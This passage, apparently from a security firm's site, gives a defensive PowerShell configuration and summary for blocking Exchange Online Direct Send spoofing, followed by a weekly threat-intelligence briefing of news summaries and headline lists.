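if (-not $orgConfig.RejectDirectSend) {
    Write-Warning "RejectDirectSend is off: anonymous mail claiming $AcceptedDomain is accepted by the tenant smart host."
}

# 2. If you do not need Direct Send, block it tenant-wide (the corrected state).
#    Anonymous messages sent to <tenant>.mail.protection.outlook.com with an
#    envelope sender in an accepted domain are rejected. Test first: legacy
#    printers and applications that relied on Direct Send will start failing.
Set-OrganizationConfig -RejectDirectSend $true

# 3. If a device must still send as your domain, authenticate it through an
#    inbound partner connector restricted by TLS certificate (preferred over IPs).
New-InboundConnector -Name "DirectSend-Printers-Cert" `
    -ConnectorType Partner `
    -SenderDomains $AcceptedDomain `
    -RequireTls $true `
    -RestrictDomainsToCertificate $true `
    -TlsSenderCertificateName $PrinterCertName `
    -Enabled $true

# 4. If your MX points at a third-party gateway, only that gateway may deliver
#    to the tenant: mail for any sender domain ("*") from other IPs is refused,
#    closing the direct-to-tenant path that bypasses external filtering.
New-InboundConnector -Name "Gateway-Only-Inbound" `
    -ConnectorType Partner `
    -SenderDomains "*" `
    -RequireTls $true `
    -RestrictDomainsToIPAddresses $true `
    -SenderIPAddresses $GatewayIPs `
    -Enabled $true

# 5. Quarantine-first rule for tenants not yet ready to reject: mail arriving
#    from outside the organisation, claiming your own domain and failing
#    composite authentication is quarantined, unless it came via the approved
#    gateway. Start in Audit mode to find legitimate senders before enforcing.
New-TransportRule -Name "Quarantine unauthenticated internal-looking mail" `
    -FromScope NotInOrganization `
    -SenderDomainIs $AcceptedDomain `
    -HeaderMatchesMessageHeader "Authentication-Results" `
    -HeaderMatchesPatterns "compauth=fail" `
    -ExceptIfSenderIpRanges $GatewayIPs `
    -Quarantine $true `
    -Mode Audit

# 6. Verify the resulting state before switching the rule from Audit to Enforce.
Get-OrganizationConfig | Select-Object RejectDirectSend
Get-InboundConnector | Select-Object Name, ConnectorType, RestrictDomainsToCertificate, RestrictDomainsToIPAddresses
Get-TransportRule "Quarantine unauthenticated internal-looking mail" | Select-Object Name, Mode, State
```

Steps 3 and 4 are conditional on your environment; apply only the ones that match your mail routing, and review quarantine and trace results before moving the rule to Enforce.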
Technical Summary
Abuse mechanism
Direct Send allows devices and applications to send to internal recipients without authentication via tenant smart hosts such as tenantname.mail.protection.outlook.com. Threat actors send spoofed messages to those endpoints using internal-looking From addresses, often with scripted SMTP clients.
Observed tactics
Lures frequently mimic voicemail or fax notifications and include PDFs with QR codes that resolve to credential harvesters. Some campaigns relay through unsecured third-party email appliances or VPS infrastructure before final delivery.
Why it lands
Messages traverse Microsoft infrastructure and can be treated as internal, so they may land in inboxes or junk despite composite authentication failures, especially where mail routing is complex or controls are not locked down.
Microsoft controls
Microsoft introduced a tenant-wide Reject Direct Send setting, plus guidance on preventing direct delivery to the tenant and on quarantine-first transport rules for organisations not ready to block.
Activity timeline
Campaigns observed since May 2025, with multiple vendors reporting ongoing abuse through July and August 2025.
Further information
Microsoft Exchange Team: Introducing more control over Direct Send in Exchange Online. Public preview of Reject Direct Send, behaviour and error text. (TECHCOMMUNITY.MICROSOFT.COM)
Microsoft Exchange Team: Direct Send vs sending directly to an Exchange Online tenant. Lockdown patterns, connectors, hunting and quarantine-first rules. (TECHCOMMUNITY.MICROSOFT.COM)
Varonis Threat Labs: Ongoing campaign abusing Direct Send to deliver internal-appearing phishing, with timeline and technique details. (Varonis)
Proofpoint: Attackers abusing M365 for internal phishing, delivery paths via unsecured relays, and recommended mitigations. (Proofpoint)
Mimecast Threat Intelligence: Direct Send abuse overview, observed artefacts and recommendations. (Mimecast)
eSentire Advisory: Direct Send abuse leading to internal phishing, QR-code lures and response guidance. (eSentire)
Barracuda: Securing Microsoft Direct Send, attack summary and guidance. (Barracuda Blog)
IRONSCALES: Inside Job: attackers spoofing emails with M365 Direct Send, controls to reduce risk. (IRONSCALES)
BleepingComputer: Microsoft 365 Direct Send abused to send phishing as internal users. (BleepingComputer)
Need help understanding your gaps, or just want some advice? Get in touch with us.
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 15 August 2025
Black Arrow Cyber Threat Intelligence Briefing 15 August 2025:
-Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw
-Nearly Half of Enterprises Tested Had Easily Cracked Passwords
-Leaked Credentials Up 160% - What Attackers Are Doing With Them
-Ransomware Attacks Up by 41% Globally
-Physical Threats to Crypto Owners Hit Record Highs
-The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training
-The Human Firewall: Building a Cyber-Aware Workforce
-Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident
-Attack Yourself First: the Logic Behind Offensive Security
-These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims
-Financial Services Could Be Next in Line for ShinyHunters
-Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating
-Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
We begin with two calls to action for stronger cyber security: ensure your systems are patched to fix vulnerabilities, in this case Microsoft Exchange servers, and ensure your team uses strong passwords. We also report on the ongoing rise in cyber attacks including the increase in ransomware, the use of physical violence in cryptocurrency-related incidents, and changes within the attacker community such as a further shift towards the financial services sector.
To address these and other threats, it is essential to have a clear and objective understanding of your risks, and to counter them through a strategy that encompasses people, operations and technology.
The UK Cyber Governance Code of Practice is a valuable reference, even for organisations outside the UK. It includes two key principles: build strong defences through your employees, and rehearse how your leadership team will respond to an incident. It is also strongly recommended to commission assessments from an attacker’s perspective, to identify and resolve vulnerabilities before they are exploited.
Contact us for impartial specialist advice and support to implement the above in a proportionate and effective manner.
Top Cyber Stories of the Last Week
Over 29,000 Exchange Servers Still Unpatched Against High-Severity Flaw
Over 29,000 Microsoft Exchange servers remain unpatched against a serious flaw that could allow attackers to gain full control of both cloud and on-premises systems in hybrid environments. The vulnerability affects Exchange 2016, 2019 and Subscription Edition, and can be exploited to bypass detection by forging trusted credentials. Despite a fix released in April 2025, scans show large numbers of exposed systems worldwide. US federal agencies have been ordered to apply patches immediately, and all organisations are strongly advised to follow suit to prevent potential domain compromise.
Nearly Half of Enterprises Tested Had Easily Cracked Passwords
Picus Security’s 2025 Blue Report found that nearly half of enterprises tested had at least one easily cracked password, with attacks using valid credentials succeeding 98% of the time. Overall, the ability to block an attack dropped from 69% in 2024 to 62%, while the ability to stop data theft fell to just 3%. Detection weaknesses persisted, with only 14% of simulated attacks triggering alerts. The report urges stronger password policies, improved monitoring for data loss, and testing for ransomware scenarios to strengthen resilience.
Leaked Credentials Up 160% - What Attackers Are Doing With Them
Leaked credentials are a growing driver of cyber breaches, accounting for 22% of incidents in 2024, according to Verizon. Cyberint reports a 160% rise in such leaks in 2025, with many remaining active and exploitable for months. Attackers increasingly use automated tools, infostealer malware, and AI-driven phishing to obtain usernames and passwords, which are then sold or reused for account takeovers, credential stuffing, and fraud. Even with strong password policies and multi-factor authentication, rapid detection is vital. Proactively identifying exposures before they are exploited is a key differentiator in reducing long-term business risk.
https://thehackernews.com/2025/08/leaked-credentials-up-160-what.html
Ransomware Attacks Up by 41% Globally
Global cyber attacks rose sharply in July, with ransomware incidents up 41% year-on-year to 487 cases. North America accounted for over half of these, followed by Europe. Business services, healthcare, and manufacturing were among the most affected sectors, while education faced the highest weekly attack rate at over 4,200 per organisation. North America saw the largest percentage increase. Notable ransomware groups Qilin, Akira, and Play drove much of the activity, with Qilin alone linked to 17% of known cases, reflecting the growing scale and sophistication of financially motivated threats.
https://betanews.com/2025/08/11/ransomware-attacks-up-by-41-percent-globally/
Physical Threats to Crypto Owners Hit Record Highs
Criminals are increasingly targeting cryptocurrency holders through both physical violence and complex online scams. Experts warn that “wrench attacks”, where victims are coerced into handing over their digital assets under threat of harm, have risen sharply, sometimes for amounts as low as $6,000. Leaks of over 80 million user identities, including 2.2 million with home addresses, have made it easier for attackers to locate victims. At the same time, the “GreedyBear” group has stolen more than $1 million through malicious browser extensions, malware, and fake websites, highlighting the growing sophistication and scale of threats in the crypto sector.
https://coinpaper.com/10443/physical-threats-to-crypto-owners-hit-record-highs
The UK Cyber Governance Code of Practice: Beyond Basic Protections to Culture, Leadership and Training
Sectors including financial services, retail and government are facing millions of sophisticated cyber attacks each month. The UK Government’s Cyber Governance Code of Practice urges boards to strengthen cyber risk management by fostering a security-focused culture, improving leadership cyber literacy, and delivering tailored, ongoing training for all staff. In 2024, global ransomware payments reached $813.55 million, underlining the stakes. Technology alone is insufficient; a vigilant, well-trained workforce operating within a Zero Trust framework can significantly enhance defences against today’s fast-evolving digital threats.
https://www.techradar.com/pro/dont-stop-at-basic-protections-make-ongoing-training-a-priority
The Human Firewall: Building a Cyber-Aware Workforce
The UK government’s latest survey shows that half of all businesses, and nearly three quarters of large firms, experienced a cyber security breach in the past year, with the average cost of a UK data breach reaching £3.58 million. As human error is linked to up to 95% of incidents, the focus is shifting from one-off awareness sessions to role-specific training and cultural change. Gamification, real-time feedback, and positive reinforcement are helping organisations turn staff from potential vulnerabilities into proactive defenders, reducing successful attacks, cutting incident response costs, and strengthening compliance.
https://www.telecomstechnews.com/news/the-human-firewall-building-a-cyber-aware-workforce/
Microsoft Warns Organisations Without a Rehearsed Response Plan Are Hit Harder by a Security Incident
Microsoft has warned that organisations without a well-rehearsed incident response plan face longer and more damaging cyber attacks. Only one in four organisations have such a plan and have practised it. Those that regularly test their procedures, run exercises and assess vulnerabilities recover in days rather than months. Experts stressed the need for strong security fundamentals, including keeping software updated, enabling logging and applying proper configurations. Attackers increasingly move quickly, often exploiting basic weaknesses before using advanced techniques, making preparation and early detection critical for limiting business impact. Contact us for details of how Black Arrow can help your leadership team to prepare and rehearse managing the business impact of a cyber security incident.
https://cyberscoop.com/microsoft-threat-intel-response-tips/
Attack Yourself First: the Logic Behind Offensive Security
Recent high-profile cyber attacks on UK retailers have highlighted the speed and sophistication of modern threats, fuelled by automation and AI. Traditional defences such as firewalls and periodic checks are no longer enough, as attackers exploit weaknesses almost instantly. Offensive security, which proactively tests systems through simulated attacks, helps organisations find and fix critical vulnerabilities before criminals can exploit them. Leadership engagement is essential, ensuring cyber security is embedded into business strategy and transformation plans. The strongest organisations will be those that continuously validate their defences rather than relying on assumptions of security.
https://www.techradar.com/pro/attack-yourself-first-the-logic-behind-offensive-security
These Two Ransomware Groups Are Ramping Up Attacks and Have Claimed Hundreds of Victims
Research by Acronis warns that the Akira and Lynx ransomware groups are intensifying attacks on small and medium-sized businesses, particularly managed service providers (MSPs). Akira has claimed over 220 victims and Lynx around 145, often gaining access through stolen credentials, VPN weaknesses, or phishing emails. Both disable security software, steal data, and encrypt systems to extort payment. MSPs are prime targets as they can provide access to multiple customers. Experts advise organisations to strengthen multi-factor authentication, keep external systems patched, and maintain robust, tested backups to reduce the risk of disruption and financial loss.
Financial Services Could Be Next in Line for ShinyHunters
Threat intelligence suggests financially motivated cyber groups are shifting focus towards banks, insurers and financial services, with a 12% rise in targeted domain registrations since July 2025, while targeting of technology firms fell by 5%. Around 700 such domains have been registered this year, some mimicking login portals of major providers. Evidence points to overlap between ShinyHunters and Scattered Spider, both linked to an English-speaking youth movement involved in a range of cyber and physical crimes. Experts advise security leaders to focus on attacker tactics and behaviours rather than group names, to better anticipate and defend against evolving threats.
https://www.infosecurity-magazine.com/news/financial-services-next-line/
Three Notorious Cybercrime Gangs, Scattered Spider, ShinyHunters and Lapsus$, Appear to Be Collaborating
Three well-known cyber crime groups, Scattered Spider, ShinyHunters and Lapsus$, appear to be working together under a loose collective known as The Com. Recent activity suggests Scattered Spider is providing initial access to high-value targets, enabling ShinyHunters to carry out large-scale data theft and extortion. The groups have been linked to coordinated attacks on global retail, insurance, and aviation brands, often exploiting trusted enterprise tools like Salesforce and Okta through social engineering. Experts warn their methods are well-documented but highly effective, with weak helpdesk identity checks and poor multi-factor authentication enforcement remaining key vulnerabilities.
https://www.theregister.com/2025/08/12/scattered_spidershinyhunterslapsus_cybercrime_collab/
Nation State Actor Groups are Getting Personal, Going After Executives in Their Personal Lives
Threat groups linked to nation states are increasingly targeting executives through their personal lives, exploiting less secure home networks, private devices and family connections. Remote working, personal cloud use and active social media profiles provide openings for attackers to gather information and launch phishing or malware campaigns. Experts recommend organisations support executives with secure home network configurations, enterprise-grade device protections, credential monitoring, and training for both the individual and their family. This approach helps reduce the risk of personal-targeted cyber attacks while respecting privacy and avoiding intrusive monitoring.
https://www.helpnetsecurity.com/2025/08/12/apt-executive-cybersecurity-threats/
Governance, Risk and Compliance
Redefining the Role: What Makes a CISO Great
CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security
APT groups are getting personal, and CISOs should be concerned - Help Net Security
The UK’s ‘chronic shortage of cyber professionals’ is putting the country at risk | IT Pro
The human firewall: Building a cyber-aware workforce
Don't stop at basic protections; make ongoing training a priority | TechRadar
How to implement a blameless approach to cybersecurity | Kaspersky official blog
Mastering control of sovereign digital resilience | Computer Weekly
Navigating the Cybersecurity Budget Tug-of-War
What Is the Three Lines Model and What Is Its Purpose? | Definition From TechTarget
Professional services firms stuck in network security IT doom loop | Computer Weekly
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware attacks up by 41 percent globally - BetaNews
ShinyHunters Tactics Now Mirror Scattered Spider
Financial Services Could Be Next in Line for ShinyHunters - Infosecurity Magazine
Cybercrime Groups ShinyHunters, Scattered Spider Join Forces in Extortion Attacks on Businesses
Three notorious cybercrime gangs appear to be collaborating • The Register
Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector - SecurityWeek
Ransomware crews don't care about your EDR • The Register
When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers
Embargo Ransomware Gang Amasses $34.2m in Attack Proceeds - Infosecurity Magazine
Charon Ransomware Hits Middle East Sectors Using APT-Level Evasion Tactics
New Ransomware Charon Uses Earth Baxia APT Techniques to Target Enterprises | Trend Micro (US)
Crypto24 ransomware hits large orgs with custom EDR evasion tool
Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion
MedusaLocker ransomware group is looking for pentesters
Embargo Ransomware nets $34.2M in crypto since April 2024
MuddyWater’s DarkBit ransomware cracked for free data recovery
Ransomware crew dumps 43GB Saint Paul files, no ransom paid • The Register
North Korea Attacks South Koreans With Ransomware
Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times
US govt seizes $1 million in crypto from BlackSuit ransomware gang
Researchers cracked the encryption used by DarkBit ransomware
UK firms turn to back-ups over ransom payments - CIR Magazine
Law Enforcement Disrupts BlackSuit Ransomware Gang
Ransomware Victims
Google suffers a serious data breach at the hands of a ransomware group - PhoneArena
Google Confirms Data Breach - Notifying Users Affected By the Cyberattack
M&S still struggling with IT issues following cyberattack - Retail Gazette
Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine
What happened when cybercriminals hit a recruitment firm
M&S click and collect finally returns months after cyberattack | The Independent
Boeing, US Navy supplier Jamco Aerospace claimed in ransomware attack | Cybernews
Manpower franchise discloses data breach • The Register
Phishing & Email Based Attacks
The Rise of Native Phishing: Microsoft 365 Apps Abused in Attacks
Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery
Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom
WinRAR zero-day exploited to plant malware on archive extraction
Booking.com phishing campaign uses sneaky 'ん' character to trick you
Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks
For $40, you can buy stolen police and government email accounts - Help Net Security
Other Social Engineering
Help Desk at Risk: Scattered Spider Shines Light on Overlook Threat Vector - SecurityWeek
Google confirms data breach exposed potential Google Ads customers' info
Fraud, Scams and Financial Crime
FTC: older adults lost record $700 million to scammers in 2024
WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools
Deepfake detectors are coming of age, at a time of dire need • The Register
'Chairmen' of $100 million scam operation extradited to US
Over $300 million in cybercrime crypto seized in anti-fraud effort
Artificial Intelligence
MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine
CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security
Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek
Prompt injection vuln found in Google Gemini apps • The Register
Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET
Black Hat 2025: ChatGPT, Copilot, DeepSeek now create malware | VentureBeat
Guess what else GPT-5 is bad at? Security | CyberScoop
Leading AI Agents Like ChatGPT Are Vulnerable to Hacking, Security Firm Finds
New Report Warns of Looming Security Crisis as AI Agents Proliferate
62% of People Believe AI Agents Are Easier To Deceive Than Humans - IT Security Guru
Deepfake detectors are coming of age, at a time of dire need • The Register
Research reveals possible privacy gaps in Apple Intelligence’s data handling | CyberScoop
Echo Chamber, Prompts Used to Jailbreak GPT-5 in 24 Hours
From Lab to Deployment: AI-Powered Agents in Action
Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses
Employees race to build custom AI apps despite security risks - Help Net Security
Chinese biz using AI to influence US politicians • The Register
2FA/MFA
Hackers Using Dedicated Phishlet to Launch FIDO Authentication Downgrade Attacks
FIDO authentication undermined | CSO Online
Malware
Threat Actors Personalize Phishing Attacks With Advanced Tactics for Malware Delivery
When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers
Phishing attacks exploit WinRAR flaw CVE-2025-8088 to install RomCom
WinRAR zero-day exploited to plant malware on archive extraction
BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks
Adult sites are stashing exploit code inside racy .svg files - Ars Technica
Russia's RomCom among those exploiting a WinRAR 0-day • The Register
This new malware really goes the extra mile when it comes to infecting your devices | TechRadar
Hackers Found Using CrossC2 to Expand Cobalt Strike Beacon's Reach to Linux and macOS
Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine
Popular Apps Are Vessels for Malware—Here’s How To Protect Yourself
Mobile
Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability
4 ways I spot and avoid phishing scams on my iPhone
KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine
Denial of Service/DoS/DDoS
How to prevent DoS attacks and what to do if they happen | TechTarget
New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP
Critical internet flaw lets attackers crash servers | Cybernews
'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek
Internet of Things – IoT
BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks
Hackers Can Take Over Your Security Cameras—and It’s Easier Than You Think
Hyundai UK charging customers for luxury of secure car locks • The Register
Hackers Went Looking for a Backdoor in High-Security Safes—and Now Can Open Them in Seconds | WIRED
Hackers love these 7 smart home devices — here’s how to keep them secure | Tom's Guide
Smart Buses flaws expose vehicles to tracking, control, and spying
Data Breaches/Leaks
Leaked Credentials Up 160%: What Attackers Are Doing With Them
Google suffers a serious data breach at the hands of a ransomware group - PhoneArena
The US Court Records System Has Been Hacked | WIRED
New Active Directory Lateral Movement Techniques that Bypasses Authentication and Exfiltrate Data
Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine
The inside story of the Telemessage saga • The Register
North Korean Kimsuky hackers exposed in alleged data breach
Hackers leak 2.8M sensitive records from Allianz Life in Salesforce data breach
Cancer care provider breach exposes 113K+ patients | Cybernews
Connex Credit Union data breach impacts 172,000 members
Italian hotels breached en masse since June, gov confirms • The Register
ICE Accidentally Adds Wrong Person to Sensitive Group Chat About Manhunt
Organised Crime & Criminal Actors
Three notorious cybercrime gangs appear to be collaborating • The Register
Researchers identify Chinese cybercriminal working for North Korean threat group | NK News
6 ways hackers hide their tracks | CSO Online
Dark web websites: 10 things you should know | CSO Online
Cybercriminals Exploit Low-Cost Initial Access Broker Market - Infosecurity Magazine
Threat actors move to smaller more persistent attacks - BetaNews
How money mules powered cyber cons’ ‘operating system’ | Lucknow News - Times of India
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Attackers Target the Foundations of Crypto: Smart Contracts
Physical Threats to Crypto Owners Hit Record Highs
The rise of real-world cyber threats | Opinion
Over $300 million in cybercrime crypto seized in anti-fraud effort
Embargo Ransomware nets $34.2M in crypto since April 2024
Insurance
Cyber insurance market shows early signs of maturity - Help Net Security
How Insurers Use Threat Intelligence to Reduce Losses
Cloud/SaaS
Google Cloud Warns of AI-Driven Ransomware Threats and Key Defenses
Outages
Major outage at Pennsylvania OAG blamed on 'cyber incident' • The Register
Identity and Access Management
New Active Directory Lateral Movement Techniques that Bypasses Authentication and Exfiltrate Data
Encryption
BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data
New TETRA Radio Encryption Flaws Expose Law Enforcement Communications
White House could stymie the UK’s anti-encryption plans? • The Register
Linux and Open Source
BadCam: Linux-based Lenovo webcam bugs enable BadUSB attacks
Passwords, Credential Stuffing & Brute Force Attacks
46% of Enterprise Passwords Can Be Cracked | Security Magazine
Leaked Credentials Up 160%: What Attackers Are Doing With Them
Nearly half of enterprises tested had passwords cracked in Picus Security report - SiliconANGLE
Malvertising
Malvertising Campaign Deploys Modular PowerShell Malware PS1Bot - Infosecurity Magazine
Training, Education and Awareness
The human firewall: Building a cyber-aware workforce
Don't stop at basic protections; make ongoing training a priority | TechRadar
Regulations, Fines and Legislation
UK proxy traffic surges as users consider VPN alternatives • The Register
FCC tightens rules on foreign firms building undersea cables, citing security | CyberScoop
Government expands police use of live facial recognition vans - BBC News
Porn site traffic plummets as UK age verification rules enforced - BBC News
Australian Regulator Sues Optus Over 2022 Data Breach - Infosecurity Magazine
UK passport database images used in facial recognition scans • The Register
Home Office explores biometric enrolment via smartphone – PublicTechnology
Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine
White House could stymie the UK’s anti-encryption plans? • The Register
Campaigners Slam Expansion of Police Facial Recognition Schemes in UK - Infosecurity Magazine
The overlooked changes that two Trump executive orders could bring to cybersecurity | CyberScoop
EU law to protect journalists from spyware takes effect | The Record from Recorded Future News
Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times
Models, Frameworks and Standards
EU Targets Nations Lagging on NIS2 Cyber Rules | SC Media UK
Eight Countries Face EU Action Over NIS2 Deadline Failings - Infosecurity Magazine
Careers, Working in Cyber and Information Security
The UK’s ‘chronic shortage of cyber professionals’ is putting the country at risk | IT Pro
Top Cybersecurity Certifications Drive $150K+ Salaries Amid US Shortage
How military leadership prepares veterans for cybersecurity success - Help Net Security
Law Enforcement Action and Take Downs
Dark web websites: 10 things you should know | CSO Online
Over $300 million in cybercrime crypto seized in anti-fraud effort
'Chairmen' of $100 million scam operation extradited to US
US govt seizes $1 million in crypto from BlackSuit ransomware gang
Law Enforcement Disrupts BlackSuit Ransomware Gang
Intel gathered following HSE attack leads to dismantling of ransomware gang – The Irish Times
Misinformation, Disinformation and Propaganda
Don't fall for AI-powered disinformation attacks online - here's how to stay sharp | ZDNET
Your Internet, their rules: How DNS blocking shapes what we see online
Chinese biz using AI to influence US politicians • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Commander of Polish Cyberspace Defense Forces: we are in our conflict phase
China Is Winning the Cyberwar | Foreign Affairs
Nation State Actors
APT groups are getting personal, and CISOs should be concerned - Help Net Security
China
China Is Winning the Cyberwar | Foreign Affairs
APT groups are getting personal, and CISOs should be concerned - Help Net Security
Silicon under siege: Nation-state hackers target semiconductor supply chains | CSO Online
Trump's unusual Nvidia deal raises new corporate and national security risks - The Economic Times
Researchers identify Chinese cybercriminal working for North Korean threat group | NK News
Chinese biz using AI to influence US politicians • The Register
Russia
MITRE: Russian APT28's LameHug, a Pilot for Future AI Cyber-Attacks - Infosecurity Magazine
Commander of Polish Cyberspace Defense Forces: we are in our conflict phase
Russia's RomCom among those exploiting a WinRAR 0-day • The Register
Finland charges tanker crew members with sabotage of undersea cables | Finland | The Guardian
REvil Actor Accuses Russia of Planning 2021 Kaseya Attack
Russia said to be behind US Federal Court systems hack | Cybernews
Norway spy chief blames Russian hackers for dam sabotage in April | Reuters
North Korea
North Korean Kimsuky hackers exposed in alleged data breach
Hackers breach and expose a major North Korean spying operation | TechCrunch
Researchers identify Chinese cybercriminal working for North Korean threat group | NK News
North Korean network breached, hackers claim - Washington Times
North Korea Attacks South Koreans With Ransomware
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
EU law to protect journalists from spyware takes effect | The Record from Recorded Future News
Tools and Controls
CISOs face a complex tangle of tools, threats, and AI uncertainty - Help Net Security
The human firewall: Building a cyber-aware workforce
Don't stop at basic protections; make ongoing training a priority | TechRadar
Ransomware crews don't care about your EDR • The Register
Pentesting is now central to CISO strategy - Help Net Security
UK proxy traffic surges as users consider VPN alternatives • The Register
Cyber insurance market shows early signs of maturity - Help Net Security
Crypto24 ransomware hits large orgs with custom EDR evasion tool
Navigating the Cybersecurity Budget Tug-of-War
Black Hat/DEF CON: AI more useful for defense than hacking • The Register
Why DNS threats should be on every CISO's radar in 2025 - Help Net Security
Attack yourself first: the logic behind offensive security | TechRadar
How Insurers Use Threat Intelligence to Reduce Losses
FIDO authentication undermined | CSO Online
Deepfake detectors are coming of age, at a time of dire need • The Register
WhatsApp Bans 6.8M Scam Accounts in Southeast Asia with AI Tools
What Is the Three Lines Model and What Is Its Purpose? | Definition From TechTarget
UK Red Teamers “Deeply Skeptical” of AI - Infosecurity Magazine
Your Internet, their rules: How DNS blocking shapes what we see online
Porn site traffic plummets as UK age verification rules enforced - BBC News
UK traffic to popular porn sites slumps after age checks introduced | Internet safety | The Guardian
Professional services firms stuck in network security IT doom loop | Computer Weekly
The rising need for offensive security strategy and skill | SC Media
Reports Published in the Last Week
When Theft Replaces Encryption: Blue Report 2025 on Ransomware & Infostealers
Other News
6 ways hackers hide their tracks | CSO Online
Threat actors move to smaller more persistent attacks - BetaNews
Mastering control of sovereign digital resilience | Computer Weekly
What happens when cyber attacks break more than just networks? | Insurance Business America
Everything You Should Know About Wi-Fi Jammers and Your Home Security - CNET
Ex-NSA Chief Paul Nakasone Has a Warning for the Tech World | WIRED
South Korea’s Yes24 ticketing platform hit by cyber attack - TheTicketingBusiness News
Vulnerability Management
Microsoft Sued For Killing Windows 10—All Users Must Act Now
Windows 11 23H2 Home and Pro reach end of support in November
Vulnerabilities
Russia's RomCom among those exploiting a WinRAR 0-day • The Register
Over 29,000 Exchange servers unpatched against high-severity flaw
Microsoft August 2025 Patch Tuesday Fixes Kerberos Zero-Day Among 111 Total New Flaws
Over 3,000 NetScaler devices left unpatched against CitrixBleed 2 bug
Zoom patches critical Windows flaw allowing privilege escalation
Active attacks target Office vuln patched 8 years ago • The Register
Spike in Fortinet VPN brute-force attacks raises zero-day concerns
Cisco Warns of CVSS 10.0 FMC RADIUS Flaw Allowing Remote Code Execution
FortiWeb Authentication Bypass Vulnerability Let Attackers Log in As Any Existing User
Windows Remote Desktop Services Vulnerability Let Attacker Deny Services Over Network
BitUnlocker - Multiple 0-days to Bypass BitLocker and Extract All Protected Data
New Active Directory Lateral Movement Techniques that Bypass Authentication and Exfiltrate Data
New Win-DDoS Flaws Let Attackers Turn Public Domain Controllers into DDoS Botnet via RPC, LDAP
'MadeYouReset' HTTP2 Vulnerability Enables Massive DDoS Attacks - SecurityWeek
Red Teams Jailbreak GPT-5 With Ease, Warn It's ‘Nearly Unusable’ for Enterprise - SecurityWeek
Prompt injection vuln found in Google Gemini apps • The Register
Akira Ransomware Exploits SonicWall Zero-Day with BYOVD Evasion
Windows Hello for Business Flaw Could Allow Unauthorized Access
WinRAR Zero-Day Under Active Exploitation – Update to Latest Version Immediately
Microsoft Entra OAuth Flaw Exposed Internal Apps to Unauthorized Access
SonicWall pins firewall attack spree on year-old vulnerability | CyberScoop
Netherlands: Citrix Netscaler flaw CVE-2025-6543 exploited to breach orgs
Fortinet, Ivanti Release August 2025 Security Patches - SecurityWeek
Critical FortiSIEM Vulnerability Let Attackers to Execute Malicious Commands - PoC Found in Wild
Fortinet SSL VPNs Hit by Global Brute-Force Wave Before Attackers Shift to FortiManager
New Linux Kernel Vulnerability Directly Exploited from Chrome Renderer Sandbox
7-Zip Arbitrary File Write Vulnerability Let Attackers Execute Arbitrary Code
Trend Micro reports two critical CVEs under active exploit • The Register
Chipmaker Patch Tuesday: Many Vulnerabilities Addressed by Intel, AMD, Nvidia - SecurityWeek
Vulnerabilities in Xerox Print Orchestration Product Allow Remote Code Execution - SecurityWeek
Hackers Could Gain Full Control of Your Rooted Android Devices by Exploiting One Vulnerability
SAP fixed 26 flaws in August 2025 Update, including 4 Critical
Researchers Spot XZ Utils Backdoor in Dozens of Docker Hub Images, Fueling Supply Chain Risks
Flaws in a pair of Grafana plugins could hand over DevOps control | CSO Online
New TETRA Radio Encryption Flaws Expose Law Enforcement Communications
KernelSU v0.5.7 Flaw Lets Android Apps Gain Root Access - Infosecurity Magazine
Matrix admits 'high severity' flaws need breaking fixes • The Register
Sector Specific
Industry-specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
